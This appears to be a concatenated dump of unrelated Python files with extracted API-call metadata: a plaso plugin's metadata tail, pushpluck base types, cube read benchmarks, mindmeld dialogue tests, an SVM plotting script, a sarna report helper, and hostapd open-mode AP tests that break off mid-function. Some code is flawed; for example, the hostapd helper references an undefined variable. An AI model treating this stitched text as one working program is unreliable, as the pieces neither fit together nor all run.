'dfdatetime_time_elements.TimeElements', ([], {'time_elements_tuple': 'time_elements_tuple'}), '(time_elements_tuple=time_elements_tuple)\n', (4500, 4541), True, 'from dfdatetime import time_elements as dfdatetime_time_elements\n'), ((5709, 5829), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['date_time', 'definitions.TIME_DESCRIPTION_UPDATE'], {'time_zone': 'parser_mediator.timezone'}), '(date_time, definitions.\n TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone)\n', (5740, 5829), False, 'from plaso.containers import time_events\n')]
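As an illustration (not part of the repository file above): the _UPDATE_DATE_TIME_RE pattern, copied verbatim, matched against the sample value quoted in the plugin docstring.

import re

update_re = re.compile(
    r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
    r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')

match = update_re.match('07/13/2013 10:03:14 AM')
print(match.groups())   # ('07', '13', '2013', '10', '03', '14', 'AM')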
ejconlon/pushpluck
pushpluck/base.py
4e5b8bcff6fe3955e8f25638268569f901815b5a
from abc import ABCMeta, abstractmethod from dataclasses import dataclass from typing import Any, TypeVar X = TypeVar('X') class Closeable(metaclass=ABCMeta): @abstractmethod def close(self) -> None: """ Close this to free resources and deny further use. """ raise NotImplementedError() class Resettable(metaclass=ABCMeta): @abstractmethod def reset(self) -> None: """ Reset this to a known good state for further use. """ raise NotImplementedError() class Void: """ None is the type with 1 inhabitant, None. Void is the type with 0 inhabitants. """ def __init__(self) -> None: raise Exception('Cannot instantiate Void') def absurd(self) -> X: """ This allows you to trivially satisfy type checking by returning `void.absurd()` since it's impossible for `void` to exist in the first place. """ raise Exception('Absurd') @dataclass(frozen=True) class Unit: """ A simple type with one inhabitant (according to eq and hash). """ @staticmethod def instance() -> 'Unit': return _UNIT_SINGLETON _UNIT_SINGLETON = Unit() class MatchException(Exception): def __init__(self, value: Any) -> None: super().__init__(f'Failed to match value: {value}')
[((112, 124), 'typing.TypeVar', 'TypeVar', (['"""X"""'], {}), "('X')\n", (119, 124), False, 'from typing import Any, TypeVar\n'), ((941, 963), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (950, 963), False, 'from dataclasses import dataclass\n')]
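As an illustration (not part of the repository file above) of the claim that Unit has exactly one inhabitant according to eq and hash; the import mirrors the repo_path above.

from pushpluck.base import Unit

u1 = Unit.instance()
u2 = Unit.instance()
assert u1 is u2        # instance() always hands back the same singleton
assert u1 == Unit()    # equality holds for any Unit: the frozen dataclass has no fields
assert hash(u1) == hash(Unit())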
CAB-LAB/cube-performance-test
test/cuberead/highres/test_default_high_res.py
0ca7dbb56b2937004fb63f8aafdff21fb76263d4
import time import pytest from test import config from test.cube_utils import CubeUtils ITERATIONS_NUM = getattr(config, 'iterations_num', 1) ROUNDS_NUM = getattr(config, 'rounds_num', 10) class TestDefaultHighRes: @pytest.fixture(scope="class", autouse=True) def cube_default(self): cube_utils = CubeUtils() cube_utils.generate_cube("default_high_res", 46, 2160, 4320) yield cube_utils # --------------- # Read spatially # --------------- @pytest.mark.benchmark( group="Cube reading for small area spatial analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_135x135(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) @pytest.mark.benchmark( group="Cube reading for large area spatial analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_2160x2160(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) # --------------- # Read temporally # --------------- @pytest.mark.benchmark( group="Cube reading for subset temporal analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_46x135x135(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) @pytest.mark.benchmark( group="Cube reading for global temporal analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
[((225, 268), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""class"""', 'autouse': '(True)'}), "(scope='class', autouse=True)\n", (239, 268), False, 'import pytest\n'), ((496, 646), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for small area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for small area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (517, 646), False, 'import pytest\n'), ((869, 1019), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for large area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for large area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (890, 1019), False, 'import pytest\n'), ((1312, 1459), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for subset temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for subset temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1333, 1459), False, 'import pytest\n'), ((1686, 1833), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for global temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for global temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1707, 1833), False, 'import pytest\n'), ((318, 329), 'test.cube_utils.CubeUtils', 'CubeUtils', ([], {}), '()\n', (327, 329), False, 'from test.cube_utils import CubeUtils\n')]
dyoshiha/mindmeld
tests/components/test_dialogue_flow.py
95f0e8482594f00040766a2ee687e9c9338f5a74
import pytest from mindmeld.components import Conversation def assert_reply(directives, templates, *, start_index=0, slots=None): """Asserts that the provided directives contain the specified reply Args: directives (list[dict[str, dict]]): list of directives returned by application templates (Union[str, Set[str]]): The reply must be a member of this set. start_index (int, optional): The index of the first client action associated with this reply. slots (dict, optional): The slots to fill the templates """ slots = slots or {} if isinstance(templates, str): templates = [templates] texts = set(map(lambda x: x.format(**slots), templates)) assert len(directives) >= start_index + 1 assert directives[start_index]['name'] == 'reply' assert directives[start_index]['payload']['text'] in texts def assert_target_dialogue_state(convo, target_dialogue_state): assert convo.params.target_dialogue_state == target_dialogue_state @pytest.mark.conversation def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('are there any stores near me?').directives assert_target_dialogue_state(convo, 'send_store_hours_flow') assert_reply(directives, templates="I'm not sure. You haven't told me where you are!") @pytest.mark.conversation def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('Howdy!').directives assert_target_dialogue_state(convo, 'send_store_hours_flow') assert_reply(directives, templates='Sorry, I did not get you. Which store would you like to know about?') @pytest.mark.conversation def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') for i in range(2): directives = convo.process('When does that open?').directives assert_reply(directives, 'Which store would you like to know about?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('When does that open?').directives assert_reply(directives, 'Sorry I cannot help you. 
Please try again.') assert_target_dialogue_state(convo, None) @pytest.mark.conversation def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('exit').directives assert_target_dialogue_state(convo, None) assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.']) def assert_dialogue_state(dm, dialogue_state): for rule in dm.rules: if rule.dialogue_state == dialogue_state: return True return False def test_dialogue_flow_async(async_kwik_e_mart_app): @async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent') async def some_handler(context, responder): pass assert some_handler.flow_state == 'some_handler_flow' assert 'some_handler' in some_handler.all_flows dm = some_handler.dialogue_manager assert_dialogue_state(dm, 'some_handler') assert_dialogue_state(dm, 'some_handler_flow') assert len(some_handler.rules) == 0 @some_handler.handle(intent='some_intent') async def some_flow_handler(context, responder): pass assert len(some_handler.rules) == 1 @some_handler.handle(intent='some_intent_2', exit_flow=True) async def some_flow_handler_2(context, responder): pass assert len(some_handler.rules) == 2 assert 'some_flow_handler_2' in some_handler.exit_flow_states def test_dialogue_flow(kwik_e_mart_app): @kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent') def some_handler(context, responder): pass assert some_handler.flow_state == 'some_handler_flow' assert 'some_handler' in some_handler.all_flows dm = some_handler.dialogue_manager assert_dialogue_state(dm, 'some_handler') assert_dialogue_state(dm, 'some_handler_flow') assert len(some_handler.rules) == 0 @some_handler.handle(intent='some_intent') def some_flow_handler(context, responder): pass assert len(some_handler.rules) == 1 @some_handler.handle(intent='some_intent_2', exit_flow=True) def some_flow_handler_2(context, responder): pass assert len(some_handler.rules) == 2 assert 'some_flow_handler_2' in some_handler.exit_flow_states
[((1209, 1300), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1221, 1300), False, 'from mindmeld.components import Conversation\n'), ((1835, 1926), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1847, 1926), False, 'from mindmeld.components import Conversation\n'), ((2455, 2546), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (2467, 2546), False, 'from mindmeld.components import Conversation\n'), ((3273, 3364), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (3285, 3364), False, 'from mindmeld.components import Conversation\n')]
nextzlog/mine
mine/src/main/python/SVM.py
49ef0bea4796920d8696dc5f076f86c0ab17be80
import os,sys import webbrowser import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.cm as cm import matplotlib.pylab as plt from matplotlib import ticker plt.rcParams['font.family'] = 'monospace' fig = plt.figure() rect = fig.add_subplot(111, aspect='equal') data0 = np.loadtxt('data0.dat', delimiter=',') data1 = np.loadtxt('data1.dat', delimiter=',') dense = np.loadtxt('dense.dat', delimiter=',') ID = sys.argv[1] X = np.arange(-2.0, 2.05, 0.05) Y = np.arange(-2.0, 2.05, 0.05) Xm, Ym = np.meshgrid(X, Y) vmin, vmax = dense.min(), dense.max() if vmin * vmax < 0: vmin = -abs(max(-vmin, vmax)) vmax = +abs(max(-vmin, vmax)) cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower') plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2]) plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2]) cb = plt.colorbar(cr, format='%+.1e') cb.solids.set_edgecolor('face') cb.set_ticks(ticker.LinearLocator(6)) cb.ax.tick_params(labelsize=12) rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1) rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1) plt.xlim(X[0], X[-1]) plt.ylim(Y[0], Y[-1]) plt.xlabel("") plt.ylabel("") plt.grid(ls='dotted') plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1) plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1) os.remove('dense.dat') os.remove('data0.dat') os.remove('data1.dat') webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
[((69, 90), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (83, 90), False, 'import matplotlib\n'), ((228, 240), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (238, 240), True, 'import matplotlib.pylab as plt\n'), ((293, 331), 'numpy.loadtxt', 'np.loadtxt', (['"""data0.dat"""'], {'delimiter': '""","""'}), "('data0.dat', delimiter=',')\n", (303, 331), True, 'import numpy as np\n'), ((340, 378), 'numpy.loadtxt', 'np.loadtxt', (['"""data1.dat"""'], {'delimiter': '""","""'}), "('data1.dat', delimiter=',')\n", (350, 378), True, 'import numpy as np\n'), ((387, 425), 'numpy.loadtxt', 'np.loadtxt', (['"""dense.dat"""'], {'delimiter': '""","""'}), "('dense.dat', delimiter=',')\n", (397, 425), True, 'import numpy as np\n'), ((447, 474), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (456, 474), True, 'import numpy as np\n'), ((479, 506), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (488, 506), True, 'import numpy as np\n'), ((516, 533), 'numpy.meshgrid', 'np.meshgrid', (['X', 'Y'], {}), '(X, Y)\n', (527, 533), True, 'import numpy as np\n'), ((795, 894), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[-1, 1]', 'cmap': 'cm.bwr', 'linestyles': '"""dashed"""', 'linewidths': '[2, 2]'}), "(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed',\n linewidths=[2, 2])\n", (806, 894), True, 'import matplotlib.pylab as plt\n'), ((890, 985), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[0]', 'colors': '"""black"""', 'linestyles': '"""dashed"""', 'linewidths': '[2]'}), "(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed',\n linewidths=[2])\n", (901, 985), True, 'import matplotlib.pylab as plt\n'), ((987, 1019), 'matplotlib.pylab.colorbar', 'plt.colorbar', (['cr'], {'format': '"""%+.1e"""'}), "(cr, format='%+.1e')\n", (999, 1019), True, 'import matplotlib.pylab as plt\n'), ((1318, 1339), 'matplotlib.pylab.xlim', 'plt.xlim', (['X[0]', 'X[-1]'], {}), '(X[0], X[-1])\n', (1326, 1339), True, 'import matplotlib.pylab as plt\n'), ((1340, 1361), 'matplotlib.pylab.ylim', 'plt.ylim', (['Y[0]', 'Y[-1]'], {}), '(Y[0], Y[-1])\n', (1348, 1361), True, 'import matplotlib.pylab as plt\n'), ((1362, 1376), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1372, 1376), True, 'import matplotlib.pylab as plt\n'), ((1377, 1391), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (1387, 1391), True, 'import matplotlib.pylab as plt\n'), ((1392, 1413), 'matplotlib.pylab.grid', 'plt.grid', ([], {'ls': '"""dotted"""'}), "(ls='dotted')\n", (1400, 1413), True, 'import matplotlib.pylab as plt\n'), ((1554, 1576), 'os.remove', 'os.remove', (['"""dense.dat"""'], {}), "('dense.dat')\n", (1563, 1576), False, 'import os, sys\n'), ((1577, 1599), 'os.remove', 'os.remove', (['"""data0.dat"""'], {}), "('data0.dat')\n", (1586, 1599), False, 'import os, sys\n'), ((1600, 1622), 'os.remove', 'os.remove', (['"""data1.dat"""'], {}), "('data1.dat')\n", (1609, 1622), False, 'import os, sys\n'), ((1065, 1088), 'matplotlib.ticker.LinearLocator', 'ticker.LinearLocator', (['(6)'], {}), '(6)\n', (1085, 1088), False, 'from matplotlib import ticker\n')]
rsrdesarrollo/sarna
sarna/report_generator/scores.py
0c1f44e06a932520b70e505585a5469b77f6302e
from sarna.model.enums import Score, Language
from sarna.report_generator import make_run
from sarna.report_generator.locale_choice import locale_choice
from sarna.report_generator.style import RenderStyle


def score_to_docx(score: Score, style: RenderStyle, lang: Language):
    ret = make_run(getattr(style, score.name.lower()), locale_choice(score, lang))

    for warn in style._warnings:
        # TODO: something
        print(warn)

    return ret
[((332, 358), 'sarna.report_generator.locale_choice.locale_choice', 'locale_choice', (['score', 'lang'], {}), '(score, lang)\n', (345, 358), False, 'from sarna.report_generator.locale_choice import locale_choice\n')]
waittrue/wireless
tests/hwsim/test_ap_open.py
3c64f015dc62aec4da0b696f45cc4bcf41594c5d
# Open mode AP tests # Copyright (c) 2014, Qualcomm Atheros, Inc. # # This software may be distributed under the terms of the BSD license. # See README for more details. import logging logger = logging.getLogger() import struct import subprocess import time import os import hostapd import hwsim_utils from tshark import run_tshark from utils import alloc_fail from wpasupplicant import WpaSupplicant def test_ap_open(dev, apdev): """AP with open mode (no security) configuration""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5) if ev is None: raise Exception("No connection event received from hostapd") hwsim_utils.test_connectivity(dev[0], hapd) dev[0].request("DISCONNECT") ev = hapd.wait_event([ "AP-STA-DISCONNECTED" ], timeout=5) if ev is None: raise Exception("No disconnection event received from hostapd") def test_ap_open_packet_loss(dev, apdev): """AP with open mode configuration and large packet loss""" params = { "ssid": "open", "ignore_probe_probability": "0.5", "ignore_auth_probability": "0.5", "ignore_assoc_probability": "0.5", "ignore_reassoc_probability": "0.5" } hapd = hostapd.add_ap(apdev[0]['ifname'], params) for i in range(0, 3): dev[i].connect("open", key_mgmt="NONE", scan_freq="2412", wait_connect=False) for i in range(0, 3): dev[i].wait_connected(timeout=20) def test_ap_open_unknown_action(dev, apdev): """AP with open mode configuration and unknown Action frame""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") bssid = apdev[0]['bssid'] cmd = "MGMT_TX {} {} freq=2412 action=765432".format(bssid, bssid) if "FAIL" in dev[0].request(cmd): raise Exception("Could not send test Action frame") ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10) if ev is None: raise Exception("Timeout on MGMT-TX-STATUS") if "result=SUCCESS" not in ev: raise Exception("AP did not ack Action frame") def test_ap_open_invalid_wmm_action(dev, apdev): """AP with open mode configuration and invalid WMM Action frame""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") bssid = apdev[0]['bssid'] cmd = "MGMT_TX {} {} freq=2412 action=1100".format(bssid, bssid) if "FAIL" in dev[0].request(cmd): raise Exception("Could not send test Action frame") ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10) if ev is None or "result=SUCCESS" not in ev: raise Exception("AP did not ack Action frame") def test_ap_open_reconnect_on_inactivity_disconnect(dev, apdev): """Reconnect to open mode AP after inactivity related disconnection""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") hapd.request("DEAUTHENTICATE " + dev[0].p2p_interface_addr() + " reason=4") dev[0].wait_disconnected(timeout=5) dev[0].wait_connected(timeout=2, error="Timeout on reconnection") def test_ap_open_assoc_timeout(dev, apdev): """AP timing out association""" ssid = "test" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].scan(freq="2412") hapd.set("ext_mgmt_frame_handling", "1") dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", wait_connect=False) for i in range(0, 10): req = hapd.mgmt_rx() if req is None: raise Exception("MGMT RX wait timed out") if req['subtype'] == 11: break req = None if not req: raise Exception("Authentication frame not received") resp = {} 
resp['fc'] = req['fc'] resp['da'] = req['sa'] resp['sa'] = req['da'] resp['bssid'] = req['bssid'] resp['payload'] = struct.pack('<HHH', 0, 2, 0) hapd.mgmt_tx(resp) assoc = 0 for i in range(0, 10): req = hapd.mgmt_rx() if req is None: raise Exception("MGMT RX wait timed out") if req['subtype'] == 0: assoc += 1 if assoc == 3: break if assoc != 3: raise Exception("Association Request frames not received: assoc=%d" % assoc) hapd.set("ext_mgmt_frame_handling", "0") dev[0].wait_connected(timeout=15) def test_ap_open_id_str(dev, apdev): """AP with open mode and id_str""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", id_str="foo", wait_connect=False) ev = dev[0].wait_connected(timeout=10) if "id_str=foo" not in ev: raise Exception("CTRL-EVENT-CONNECT did not have matching id_str: " + ev) if dev[0].get_status_field("id_str") != "foo": raise Exception("id_str mismatch") def test_ap_open_select_any(dev, apdev): """AP with open mode and select any network""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) id = dev[0].connect("unknown", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev[0].select_network(id) ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND", "CTRL-EVENT-CONNECTED"], timeout=10) if ev is None: raise Exception("No result reported") if "CTRL-EVENT-CONNECTED" in ev: raise Exception("Unexpected connection") dev[0].select_network("any") dev[0].wait_connected(timeout=10) def test_ap_open_unexpected_assoc_event(dev, apdev): """AP with open mode and unexpected association event""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") dev[0].request("DISCONNECT") dev[0].wait_disconnected(timeout=15) dev[0].dump_monitor() # This will be accepted due to matching network subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412", apdev[0]['bssid']]) dev[0].wait_connected(timeout=15) dev[0].dump_monitor() dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected(timeout=5) dev[0].dump_monitor() # This will result in disconnection due to no matching network subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412", apdev[0]['bssid']]) dev[0].wait_disconnected(timeout=15) def test_ap_bss_load(dev, apdev): """AP with open mode (no security) configuration""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "bss_load_update_period": "10" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") # this does not really get much useful output with mac80211_hwsim currently, # but run through the channel survey update couple of times for i in range(0, 10): hwsim_utils.test_connectivity(dev[0], hapd) hwsim_utils.test_connectivity(dev[0], hapd) hwsim_utils.test_connectivity(dev[0], hapd) time.sleep(0.15) def hapd_out_of_mem(hapd, apdev, count, func): with alloc_fail(hapd, count, func): started = False try: hostapd.add_ap(apdev['ifname'], { "ssid": "open" }) started = True except: pass if started: raise Exception("hostapd interface started even with memory allocation failure: " + arg) def test_ap_open_out_of_memory(dev, apdev): """hostapd failing to setup interface due to allocation failure""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_alloc_bss_data") for i in range(1, 3): hapd_out_of_mem(hapd, apdev[1], i, "hostapd_iface_alloc") for i in range(1, 5): 
hapd_out_of_mem(hapd, apdev[1], i, "hostapd_config_defaults;hostapd_config_alloc") hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_config_alloc") hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_driver_init") for i in range(1, 4): hapd_out_of_mem(hapd, apdev[1], i, "=wpa_driver_nl80211_drv_init") # eloop_register_read_sock() call from i802_init() hapd_out_of_mem(hapd, apdev[1], 1, "eloop_sock_table_add_sock;eloop_register_sock;?eloop_register_read_sock;=i802_init") # verify that a new interface can still be added when memory allocation does # not fail hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" }) def test_bssid_black_white_list(dev, apdev): """BSSID black/white list""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist=apdev[1]['bssid']) dev[1].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_blacklist=apdev[1]['bssid']) dev[2].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="00:00:00:00:00:00/00:00:00:00:00:00", bssid_blacklist=apdev[1]['bssid']) if dev[0].get_status_field('bssid') != apdev[1]['bssid']: raise Exception("dev[0] connected to unexpected AP") if dev[1].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[1] connected to unexpected AP") if dev[2].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[2] connected to unexpected AP") dev[0].request("REMOVE_NETWORK all") dev[1].request("REMOVE_NETWORK all") dev[2].request("REMOVE_NETWORK all") dev[2].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="00:00:00:00:00:00", wait_connect=False) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff") dev[1].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_blacklist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff") if dev[0].get_status_field('bssid') != apdev[1]['bssid']: raise Exception("dev[0] connected to unexpected AP") if dev[1].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[1] connected to unexpected AP") dev[0].request("REMOVE_NETWORK all") dev[1].request("REMOVE_NETWORK all") ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) if ev is not None: raise Exception("Unexpected dev[2] connectin") dev[2].request("REMOVE_NETWORK all") def test_ap_open_wpas_in_bridge(dev, apdev): """Open mode AP and wpas interface in a bridge""" br_ifname='sta-br0' ifname='wlan5' try: _test_ap_open_wpas_in_bridge(dev, apdev) finally: subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'down']) subprocess.call(['brctl', 'delif', br_ifname, ifname]) subprocess.call(['brctl', 'delbr', br_ifname]) subprocess.call(['iw', ifname, 'set', '4addr', 'off']) def _test_ap_open_wpas_in_bridge(dev, apdev): hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) br_ifname='sta-br0' ifname='wlan5' wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5') # First, try a failure case of adding an interface try: wpas.interface_add(ifname, br_ifname=br_ifname) raise Exception("Interface addition succeeded unexpectedly") except Exception, e: if "Failed to add" in str(e): logger.info("Ignore expected interface_add failure due to missing bridge interface: " + str(e)) else: raise # Next, add the bridge interface and add the interface again subprocess.call(['brctl', 'addbr', br_ifname]) subprocess.call(['brctl', 'setfd', br_ifname, 
'0']) subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'up']) subprocess.call(['iw', ifname, 'set', '4addr', 'on']) subprocess.check_call(['brctl', 'addif', br_ifname, ifname]) wpas.interface_add(ifname, br_ifname=br_ifname) wpas.connect("open", key_mgmt="NONE", scan_freq="2412") def test_ap_open_start_disabled(dev, apdev): """AP with open mode and beaconing disabled""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "start_disabled": "1" }) bssid = apdev[0]['bssid'] dev[0].flush_scan_cache() dev[0].scan(freq=2412, only_new=True) if dev[0].get_bss(bssid) is not None: raise Exception("AP was seen beaconing") if "OK" not in hapd.request("RELOAD"): raise Exception("RELOAD failed") dev[0].scan_for_bss(bssid, freq=2412) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") def test_ap_open_start_disabled2(dev, apdev): """AP with open mode and beaconing disabled (2)""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "start_disabled": "1" }) bssid = apdev[0]['bssid'] dev[0].flush_scan_cache() dev[0].scan(freq=2412, only_new=True) if dev[0].get_bss(bssid) is not None: raise Exception("AP was seen beaconing") if "OK" not in hapd.request("UPDATE_BEACON"): raise Exception("UPDATE_BEACON failed") dev[0].scan_for_bss(bssid, freq=2412) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") if "OK" not in hapd.request("UPDATE_BEACON"): raise Exception("UPDATE_BEACON failed") dev[0].request("DISCONNECT") dev[0].wait_disconnected() dev[0].request("RECONNECT") dev[0].wait_connected() def test_ap_open_ifdown(dev, apdev): """AP with open mode and external ifconfig down""" 